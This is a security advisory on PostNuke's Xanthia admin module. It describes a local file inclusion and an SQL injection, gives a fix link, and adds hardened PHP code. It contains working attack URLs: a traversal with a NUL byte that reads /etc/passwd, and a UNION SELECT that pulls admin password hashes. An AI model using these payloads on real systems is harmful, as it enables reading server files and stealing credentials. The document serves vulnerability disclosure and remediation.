PostNuke Non Critical SQL Injection and Include 0.760-RC3=>x

2005.09.30
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

[PostNuke Non Critical SQL Injection and Include 0.760-RC3=>x cXIb8O3.10]

Author: cXIb8O3 (Maksymilian Arciemowicz)
Date: 2.4.2005
from cxsecurity.com TEAM

--- 0. Description ---

PostNuke: The Phoenix Release (0.760-RC3=>X)

PostNuke is an open source, open development content management system (CMS). PostNuke started as a fork from PHP-Nuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development, but a large number of core functions are now stabilising and a complete API for third-party developers is now in place.

If you would like to help develop this software, please visit our homepage at http://noc.postnuke.com/
You can also visit us on our IRC server irc.postnuke.com, channels #postnuke-support #postnuke-chat #postnuke
Or at the Community Forums located at: http://forums.postnuke.com/

--- 1. Non Critical Local File Include ---

This error exists in modules/Xanthia/pnadminapi.php. The theme name passed in the "skin" parameter is concatenated into an include path without any validation, so an attacker who holds admin rights can read any file on the server if PHP is misconfigured. For example:

http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=addTheme&authid=&skin=cXIb8O3

Error message:
- ---------------
/www/PostNuke-0.750/source/html/modules/Xanthia/pnadminapi.php on line 1053
- ---------------

or

http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=credits&skin=[FILE]

but you can give the variable "skin" a path to any other file. Example for /etc/passwd:

http://[HOST]/[DIR]/source/html/index.php?module=Xanthia&type=admin&func=addTheme&authid=&skin=../../../../../../../../etc/passwd%00

The %00 cuts the path short so that the trailing "/xaninit.php" the code appends is ignored. This only works when magic_quotes_gpc is off (otherwise the NUL byte is escaped) and on PHP versions that still accept NUL bytes in file paths (before 5.3.4); without the NUL byte the traversal still works, but the target file name must end in xaninit.php.

Vulnerable code in modules/Xanthia/pnadminapi.php:

- ---1039-1052---
$cWhereIsPerso = WHERE_IS_PERSO;
if (!(empty($cWhereIsPerso))) {
    $xaninitlang_path = $cWhereIsPerso . 'themes/'.$id.'/lang/'.$langs.'/xaninit.php';
    $xaninit_path = $cWhereIsPerso . 'themes/'.$id.'/xaninit.php';
} else {
    $xaninitlang_path = 'themes/'.$id.'/lang/'.$langs.'/xaninit.php';
    $xaninit_path = 'themes/'.$id.'/xaninit.php';
}
if (file_exists($xaninitlang_path)) {
    include_once($xaninitlang_path);
}
include_once($xaninit_path);
- ---1039-1052---

etc.

--- 2. Non Critical SQL Injection ---

This SQL injection is non-critical because it works only with admin rights. In modules/Xanthia/pnadmin.php the values of the "riga[]" request array ($dati) are interpolated straight into the query:

- ---1655-1676---
$sql="SELECT $column[module] as module, $column[block] as block, $column[position] as position
      FROM $pntable[theme_blcontrol]
      WHERE $column[position]='$dati[0]'
      ORDER BY $column[module]";
$result =& $dbconn->Execute($sql);
if(!$result->EOF) {
    // Create output object - this object will store all of our output so that
    // we can return it easily when required
    $pnRender =& new pnRender('Xanthia');
    // As Admin output changes often, we do not want caching.
    $pnRender->caching = false;
    $pnRender->assign('menu', pnModFunc('Xanthia','admin','thememenu'));
    $pnRender->assign('warn', _XA_NZWARNING);
    $pnRender->assign('columnheaders', array(pnVarPrepForDisplay(_XA_MODULE), pnVarPrepForDisplay(_XA_BLOCK)));
    while(!$result->EOF) {
        $row = $result->GetRowAssoc(false);
- ---1655-1676---

So to make a successful attack we first need to log in as PostNuke administrator. As administrator we can go to:

Example:
http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=rimuovinuovezone&skinID=8&riga[0]='cXIb8O3&riga[1]=and&riga[2]=sp3x&skin=PiterpanV2

Error message:
- ---------------
Fatal error: Call to a member function GetRowAssoc() on a non-object in /www/PostNuke-0.750/html/modules/Xanthia/pnadmin.php on line 1676
- ---------------

The unbalanced quote makes the query fail, Execute() returns false, and the code dereferences the unchecked result; that is the error above, and it confirms the injection point.

Exploit for admin:
http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=rimuovinuovezone&skinID=1&riga[0]='%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass%20FROM%20pn__users%20WHERE%20pn_uid=2/*

The UNION supplies the same three columns as the original SELECT, and the trailing /* comments out the rest of the statement, so the user name and password hash come back in the block list.

--- 3. How to fix ---

PNSA 2005-2 Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes
or CVS

Verify the downloaded archive against the digests above before unpacking it over the installation.

--- 4. Contact ---

Author: Maksymilian Arciemowicz
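As an added example (not part of the original advisory and not PostNuke's own fix), the two code paths quoted in sections 1 and 2 rewritten in hardened form. The function names xanthia_safe_theme_includes() and xanthia_blocks_for_position() are illustrative; the example assumes $dbconn is an ADOdb connection, as PostNuke used, whose Execute() accepts a bind array for "?" placeholders.

```php
<?php
// Added example, not PostNuke code. Hardened forms of the two Xanthia admin
// code paths quoted in the advisory. Function names are illustrative.

// 1. Theme name used in an include path (section 1). Accept only a plain
//    directory name and confirm the resolved path stays under $themesDir,
//    which covers both the WHERE_IS_PERSO and the relative branch.
function xanthia_safe_theme_includes($id, $langs, $themesDir)
{
    // A simple identifier cannot carry '/', '..' or a NUL byte, so the
    // traversal and %00 tricks from section 1 are rejected up front.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $id) ||
        !preg_match('/^[A-Za-z0-9_-]{1,16}$/', $langs)) {
        return false;
    }
    $base      = realpath($themesDir);
    $themePath = realpath($base . DIRECTORY_SEPARATOR . $id);
    // realpath() fails for a missing directory, and a symlink pointing out
    // of $themesDir resolves elsewhere; both cases are refused here.
    if ($base === false || $themePath === false ||
        strpos($themePath, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    $xaninitlang_path = $themePath . '/lang/' . $langs . '/xaninit.php';
    $xaninit_path     = $themePath . '/xaninit.php';
    if (file_exists($xaninitlang_path)) {
        include_once $xaninitlang_path;
    }
    if (!file_exists($xaninit_path)) {
        return false;
    }
    include_once $xaninit_path;
    return true;
}

// 2. Position value in the WHERE clause (section 2). The value from riga[0]
//    is bound as a parameter, so it never becomes part of the SQL text and
//    the "' UNION SELECT ... /*" payload is just a string that matches nothing.
function xanthia_blocks_for_position($dbconn, $pntable, $column, $position)
{
    $sql = "SELECT $column[module] AS module, $column[block] AS block, "
         . "$column[position] AS position FROM $pntable[theme_blcontrol] "
         . "WHERE $column[position] = ? ORDER BY $column[module]";
    // Assumption: ADOdb-style Execute($sql, $bindArray).
    $result = $dbconn->Execute($sql, array($position));
    // Execute() returns false on error; the original code dereferenced it
    // blindly, which produced the "on a non-object" fatal error.
    if ($result === false) {
        return array();
    }
    $rows = array();
    while (!$result->EOF) {
        $rows[] = $result->GetRowAssoc(false);
        $result->MoveNext();
    }
    return $rows;
}
```

The include guard works on the resolved path rather than on the string, so it does not depend on magic_quotes_gpc or on the PHP version's handling of NUL bytes; the query change removes the injection regardless of what riga[] contains, and the result check turns the fatal error into an empty list.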

References:

http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html


Copyright 2018, cxsecurity.com